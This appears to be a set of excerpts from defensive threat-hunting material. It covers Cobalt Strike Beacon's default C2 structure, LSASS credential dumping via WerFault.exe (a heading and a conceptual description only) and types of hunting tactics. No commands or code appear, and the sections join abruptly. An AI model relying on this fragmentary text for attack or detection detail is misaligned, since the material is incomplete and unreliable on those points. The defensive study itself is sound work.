Cobalt Strike is a fully-featured and commercially available penetration testing tool offered by Washington, DC-based Strategic Cyber LLC. The tool is advertised for “Adversary Simulations and Red Team Operations”; however, its significant customization and capabilities have led to its use by a wide variety of threat actors for a variety of motivations. Adversaries employing Cobalt Strike will often use its Beacon component during their efforts to gain initial access. By default, the Beacon component uses a standard command and control (C2) structure for its DNS queries. Adversaries that are not highly familiar with Cobalt Strike may neglect to customize the C2 structure.

#11 — LSASS Memory Dumping using WerFault.exe

Level of Complexity: Medium

Local Security Authority Subsystem Service (LSASS) is a process within Windows operating systems that is responsible for the enforcement of various security policies on a system, including verification of user logins. Once a user logs in to the system, credentials are generated and stored within the memory of the lsass.exe process. These credentials can be obtained by adversaries through various means, such as creating a memory dump of the process, and can then be used to perform lateral movement, privilege escalation, and various other attack methodologies.

Structured vs Unstructured Threat Hunting

Threat hunting is one of the most powerful capabilities an organization can have. It enables identification of new and emerging threats in an environment, often long before other, more reactive security tools. This reduces not only the mean-time-to-detection (MTTD) and the attacker’s dwell time, but also the potential harm to data and systems. Despite this, organizations continue to struggle to integrate threat hunting into their security operations. This challenge often starts with understanding the types of threat hunting, and how, and where, to use them.

Structured

Structured hunting, otherwise known as hypothesis-based hunting, is a category that is based on a central hypothesis about attackers and their associated tactics, techniques, and procedures (TTP). Unlike the Hypothesis phase of the Threat Hunting Cycle, hypothesis-based hunting is developed strictly around a scientific hypothesis, that is, a formal statement which must be falsifiable. It is often driven by an organization’s threat intelligence capabilities, but may also be informed by a hunter’s skillset and experience.

Unstructured

Unstructured hunting, often referred to as data-based hunting, is a category which is not based on a central hypothesis but rather on observable data.

Hunting Tactics

There are a number of tactics that threat hunters use for both structured and unstructured hunting. While this list is not exhaustive, it is meant to provide some insight into tactics threat hunters often use in their hunts. Note that none of these tactics are exclusive, and several can, and should, be used in tandem as seen in the TaHiTI methodology.

Intelligence Driven

Intelligence-driven hunting is a tactic used in structured hunting whereby hunters use reporting from internal and external threat intelligence providers in order to develop a hypothesis.[vii] This type of hunting will rely very heavily on the quality of intelligence reporting generated and consumed by organizations. When a new vulnerability or attack technique is released, threat intelligence reporting will document the attack, and that will often form the basis for a new hypothesis.

Target Driven

Target-driven hunting is a tactic that acknowledges that hunters have both limited time and resources, and that while attackers may gain access through a number of avenues, their ultimate targets are often similar: specific networking infrastructure and large data repositories.[viii] Therefore, when reviewing hunt plans, for organizations with limited resources, these targets should be prioritized.

Technique Driven

Technique-driven hunting is a tactic for hunting that seeks to concentrate on one, or a series of, techniques that attackers are likely to employ.[ix] These techniques are often, but not always, derived from the MITRE ATT&CK framework, and seek to uncover all usage of that technique in the environment, regardless of whether it is legitimate or not. This tactic relies heavily on threat hunters’ skills and experience with the various operating systems within the environment.
